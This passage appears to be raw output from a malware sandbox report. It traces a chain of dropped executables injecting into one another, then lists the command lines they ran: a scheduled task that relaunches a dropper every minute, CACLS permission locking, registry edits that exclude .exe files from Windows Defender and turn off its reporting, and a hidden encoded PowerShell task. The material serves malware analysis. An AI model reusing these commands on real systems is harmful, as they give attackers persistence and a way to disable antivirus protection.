N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4360 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 4360 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 4360 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 3836 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 3836 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 3836 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 4016 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe
PID 4016 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe
PID 4016 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe
PID 4940 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe
PID 4940 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe
PID 4940 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe
PID 4572 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe
PID 4572 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe
PID 4572 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4572 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe
PID 4572 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe
PID 4572 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe
PID 4940 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe
PID 4940 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe
PID 4940 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe
PID 4016 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe
PID 4016 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe
PID 4016 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3836 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe
PID 3836 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe
PID 3836 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe
PID 1936 wrote to memory of 196 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1936 wrote to memory of 196 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1936 wrote to memory of 196 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4360 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe
PID 4360 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe
PID 4360 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe
PID 196 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 196 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 196 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 196 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 196 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 196 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 4200 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe C:\Windows\System32\cmd.exe
PID 4200 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe C:\Windows\System32\cmd.exe
PID 1476 wrote to memory of 4876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 4876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 4876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 4860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1476 wrote to memory of 4860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1476 wrote to memory of 4860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1476 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe

"C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\System32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ED00.tmp\ED10.tmp\ED11.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\3E1D.exe

C:\Users\Admin\AppData\Local\Temp\3E1D.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\3EE9.exe

C:\Users\Admin\AppData\Local\Temp\3EE9.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TM0pC3TM.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4071.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\4322.exe

C:\Users\Admin\AppData\Local\Temp\4322.exe

C:\Users\Admin\AppData\Local\Temp\442C.exe

C:\Users\Admin\AppData\Local\Temp\442C.exe

C:\Users\Admin\AppData\Local\Temp\4612.exe

C:\Users\Admin\AppData\Local\Temp\4612.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5324 -s 568

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\EAA0.exe

C:\Users\Admin\AppData\Local\Temp\EAA0.exe

C:\Users\Admin\AppData\Local\Temp\ED12.exe

C:\Users\Admin\AppData\Local\Temp\ED12.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\EFF1.exe

C:\Users\Admin\AppData\Local\Temp\EFF1.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\kos2.exe

"C:\Users\Admin\AppData\Local\Temp\kos2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\7zSF2C7.tmp\Install.exe

.\Install.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 756

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp" /SL4 $E0112 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224

C:\Users\Admin\AppData\Local\Temp\K.exe

"C:\Users\Admin\AppData\Local\Temp\K.exe"

C:\Users\Admin\AppData\Local\Temp\7zS73.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 20

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 20

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gZKLshbed" /SC once /ST 03:36:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gZKLshbed"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\AppData\Local\Temp\28C5.exe

C:\Users\Admin\AppData\Local\Temp\28C5.exe

C:\Users\Admin\AppData\Local\Temp\3028.exe

C:\Users\Admin\AppData\Local\Temp\3028.exe

C:\Windows\system32\gpupdate.exe

